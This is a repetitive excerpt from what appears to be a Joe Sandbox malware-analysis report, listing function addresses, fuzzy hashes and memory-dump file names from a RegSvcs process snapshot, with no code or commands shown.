Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f810130289f3f9564c24d5827f7bbd11026d12738a808bb553353a088dd6e181
Instruction ID: 0159b66651f0e0552eb87c911d992632e64e12152d4731a044d51838b7a5ccf3
Opcode Fuzzy Hash: f810130289f3f9564c24d5827f7bbd11026d12738a808bb553353a088dd6e181
Instruction Fuzzy Hash: CE41B1B16007029FE735CF2DC880A26B7F9FF89314F144A6DE5568BA90E731E846CB90

Function 015FA470 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19825e38b96e8bdfed62f8cd2d9b53eae79f8cf6c24e7cba2e8da10ad9be34cf
Instruction ID: 5932d8547f016929dba48a56e88c21d922eb2c30545204dfd6bd262f1ffbf28f
Opcode Fuzzy Hash: 19825e38b96e8bdfed62f8cd2d9b53eae79f8cf6c24e7cba2e8da10ad9be34cf
Instruction Fuzzy Hash: 8E41DD32940206CFDF25DF6CCDA87AE7BF0FB98350F041559D625AB285DB319900CBA1

Function 015D8BF0 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bba127894ce96d6eb324aab31b5be58c5bfa11cf727d1988baea84dda0b7245
Instruction ID: af47c3b0a15a0b1852c261db8a548c3b44fac29adc03731148566c1189b4f763
Opcode Fuzzy Hash: 5bba127894ce96d6eb324aab31b5be58c5bfa11cf727d1988baea84dda0b7245
Instruction Fuzzy Hash: F941B832A01216CFE734DF5CCC90A6ABBB6FBD4604F14802AD9119F265DB75D842CB90

Function 015C8918 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e30aaabab0e85de19504f4dbd829bef707be23eb0a4b40f469984e86cb1ed727
Instruction ID: 25c0b4c8bd3dc52171ffccac3fcabc17d29aea4eb2904a0cdaeea4b067fd3630
Opcode Fuzzy Hash: e30aaabab0e85de19504f4dbd829bef707be23eb0a4b40f469984e86cb1ed727
Instruction Fuzzy Hash: C7415B315187169ED312DF69C840AABB7E9FF84B54F40092EFA85DB250E731DE148BA3

Function 015CA020 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction ID: 13fd98f0284c2b82ee786940f959e09a32689cc3935cb082b45eec307b3b93c0
Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction Fuzzy Hash: 70411A31A0062ADFEB11DE9C8840BB97FA1FB94B95F15806EEA459F341E7328D40CB91

Function 015D09AD Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97eef76cd05404927ac2defdea0b610df909f2ef90c8501fc71578e8211728a9
Instruction ID: d04285c3f972bbbc6b67a99fd8bbffef079b26a5d4e128792096fd2b4a110c55
Opcode Fuzzy Hash: 97eef76cd05404927ac2defdea0b610df909f2ef90c8501fc71578e8211728a9
Instruction Fuzzy Hash: 0D414971A40601EFD725CF19C840A2ABBF5FF94314F248A6AE459CF291E7B1E9428B91

Function 01600710 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0c50458855a09be12f916f7edb5fbf22469515b4fabd68e5ac243ec6b2fef0
Instruction ID: a9e4da3631409a3d691e12589c47d14c13c29ea5d5703bf59893b585f52f8453
Opcode Fuzzy Hash: 9f0c50458855a09be12f916f7edb5fbf22469515b4fabd68e5ac243ec6b2fef0
Instruction Fuzzy Hash: D4412875A00605EFDB29CF98C980BAABBF8FF18740B10496DE556D7291D330EA45CF50

Function 015CC156 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fcf70a1851d2dae0bd2437038a7be7c9993ca838ff3e3f2474a27247d1c5ea
Instruction ID: bcc541da0bc412b3c4f91726771a82161fb71fc6ac49ce2b05fb36a266bfa321
Opcode Fuzzy Hash: 42fcf70a1851d2dae0bd2437038a7be7c9993ca838ff3e3f2474a27247d1c5ea
Instruction Fuzzy Hash: 7C41E6719002228FCB21DFA8CC44BB9B7B5BF51308F5484A9D9499F342EB759946CF90

Function 015DA2C3 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfb947df219cdbfff7c82b4ab1111fa1a5933a09d8ee11b8fc06a22d7e943cbf
Instruction ID: 80614b7bdc772418a25995f058fccd1effb81503ed9f4cd55676dacf27debf4b
Opcode Fuzzy Hash: cfb947df219cdbfff7c82b4ab1111fa1a5933a09d8ee11b8fc06a22d7e943cbf
Instruction Fuzzy Hash: E3417630A0464ADBDB29CF6DC890B6EBBB5BF85704F2444A9E901DF291EBB5D900CB50

Function 0160C8F9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 634c239aa70f231b426e7a54e309fd977b75c8524890c0d94e241f23e5d58cd5
Instruction ID: 64bd60cd93cff29683dcf8a28278c48ee4aedfd74ad318afc0efd3936a6d4719
Opcode Fuzzy Hash: 634c239aa70f231b426e7a54e309fd977b75c8524890c0d94e241f23e5d58cd5
Instruction Fuzzy Hash: B73188B1A01205DFDB16CFA8C840B99BBF4FB49714F2081AED119EB391D3329902CF94

Function 015C80A0 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b78d107cfeb2513c74a04d37a03cc3dd4db3ab4b761c3c94c974f95c8996b73a
Instruction ID: 82267d3c382f7c1e9c72eaaa5fc593a01b952b08ad18e636e6118f9971abeefd
Opcode Fuzzy Hash: b78d107cfeb2513c74a04d37a03cc3dd4db3ab4b761c3c94c974f95c8996b73a
Instruction Fuzzy Hash: 36419F71A05616AFDB11DF98C980AADBBF1FB94B60F14862DD816AF280D734AD418BD0

Function 015C8B50 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef02037cb7d4822323a61f6a3861f61c5c54be7212951a9e94289fa2a9d7fb66
Instruction ID: d5c230911a546e7849082392f26c8a97c07988a5cf55d09225d98ba1b44aaf24
Opcode Fuzzy Hash: ef02037cb7d4822323a61f6a3861f61c5c54be7212951a9e94289fa2a9d7fb66
Instruction Fuzzy Hash: 71419FB5A01615CFCB15CFA9C9809ADB7F1FF88724B14862ED466AF360DB34A901CF40

Function 01602674 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca2b3b399db3f84b54f66771da820e52a176d661cbb9a26b39942ef3656ae8dc
Instruction ID: df5c18f2af716b30514d98c6047cafa249326d016dd84a5d537f77e3c242b787
Opcode Fuzzy Hash: ca2b3b399db3f84b54f66771da820e52a176d661cbb9a26b39942ef3656ae8dc
Instruction Fuzzy Hash: 0C314876F4021177F7228A9A9CA5FAB7B79EF94A80F15405DFB047B280D7709E01C7A1

Function 0164CCA0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8efe744b733ca783e27a765a37101ab84e6c6fdaf55d47c12be670858c5a04c8
Instruction ID: d68126247a2d9d7f68397d29fd6ac454781d13184d3b131f72e9cdc10465d4fb
Opcode Fuzzy Hash: 8efe744b733ca783e27a765a37101ab84e6c6fdaf55d47c12be670858c5a04c8
Instruction Fuzzy Hash: 2231707394161ABFDB22ABA4CC40FEEBBB9EB94750F050069EA44AB250D7719D41CB90

Function 015C8CD0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dccfd6c4568913a2de595dddfc934110e71e4d9efd0e2000e9906f362698deb8
Instruction ID: f73594acc5dcf9ffc8ae2f57353852d52b76520199613d43443d53aa610e16d9
Opcode Fuzzy Hash: dccfd6c4568913a2de595dddfc934110e71e4d9efd0e2000e9906f362698deb8
Instruction Fuzzy Hash: B931E7729002169FDB21DF98C840AAEB7F1FF95B20F14896ED456AF290CB35AD01CF90

Function 015E02E1 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5edc165bbdfc8be8ee3faece5a37676e1d6bd213eca9610b85a78c39bba728db
Instruction ID: 1015e3ee25ce29cefa7bc6478773f493306906575daa558ae5fd44d2a9a51231
Opcode Fuzzy Hash: 5edc165bbdfc8be8ee3faece5a37676e1d6bd213eca9610b85a78c39bba728db
Instruction Fuzzy Hash: F531E432A04245AFDB258B6CCC44BAFBBE9FF58350F0845A5F455DB392C6B49844CBA4

Function 015E26EB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77993d3f09c14a64daaf5de3e0ed3c6e731ad8a59e5a2c4d89f2138cff726e65
Instruction ID: 80745fd7641349a720be3c50cb7ca74e376aaae2ab6af2671e65480380bc9675
Opcode Fuzzy Hash: 77993d3f09c14a64daaf5de3e0ed3c6e731ad8a59e5a2c4d89f2138cff726e65
Instruction Fuzzy Hash: 7A41C035B042429BD71ADF18C884B2AB7E6FFC4710F0885AAE8588F355DB34DC46CBA5

Function 015D4260 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdac707fb7a7ab436e9fdd1d3d65a588d35caefa4dd1daddd75d7b427723b286
Instruction ID: da85d05726db94b034c6c2b4e6091eb83b8a6f45ce1dedfe3100ded4ed5c1a1b
Opcode Fuzzy Hash: cdac707fb7a7ab436e9fdd1d3d65a588d35caefa4dd1daddd75d7b427723b286
Instruction Fuzzy Hash: D8418D35200B45DFD722CF2CC885BAA7BE5BF85714F14882DE65A8B750DB74E844CB50

Function 0164EB1D Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0f36091266c764456583e42e9f895b2f9c1e358b74dc17423a76c6213b8001
Instruction ID: 31627ddac613600652bf563908e4909ab1de3e6cb67b5169c862e70656a20e7b
Opcode Fuzzy Hash: 3a0f36091266c764456583e42e9f895b2f9c1e358b74dc17423a76c6213b8001
Instruction Fuzzy Hash: A831C1316016869BF326576CCF48B257BD9BB40B84F1D04A4AF459B7D2DB2ED841C234

Function 015D6484 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d88991e435df6f9c9995088ac45cfdd615eb65d7c56731be0bbb1fcbcb7aa86
Instruction ID: 8095a175f766cb7bea6ea46b7a4c6471a83220a21d9e2db7d99c7a38b9d1eb92
Opcode Fuzzy Hash: 8d88991e435df6f9c9995088ac45cfdd615eb65d7c56731be0bbb1fcbcb7aa86
Instruction Fuzzy Hash: 4D31DE72640785DFEB32CF1CC881BA673A1FB41764F94807AEC488F646C735A58ACB81

Function 015FEB20 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
